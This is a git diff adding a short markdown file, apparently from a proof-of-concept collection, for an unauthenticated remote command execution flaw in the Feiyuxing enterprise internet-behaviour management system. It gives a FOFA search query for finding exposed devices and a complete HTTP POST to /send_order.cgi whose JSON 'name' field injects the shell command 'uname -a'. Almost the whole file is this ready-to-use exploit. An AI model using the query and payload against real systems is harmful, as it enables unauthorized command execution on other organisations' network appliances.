diff --git a/飞鱼星上网行为管理系统企业版前台RCE.md b/飞鱼星上网行为管理系统企业版前台RCE.md new file mode 100644 index 0000000..4efe261 --- /dev/null +++ b/飞鱼星上网行为管理系统企业版前台RCE.md @@ -0,0 +1,26 @@ +## 飞鱼星上网行为管理系统企业版前台RCE + + +## fofa +``` +title="飞鱼星企业" +``` + +## poc +``` +POST /send_order.cgi?parameter=operation HTTP/1.1 +Host: 127.0.0.1 +Pragma: no-cache +Cache-Control: no-cache +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 68 + +{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"} +``` + +![d3caa0beea2be24633c0996d8ae8819c](https://github.com/wy876/POC/assets/139549762/1be7ce47-2ee2-476c-af85-c258c27dc95f)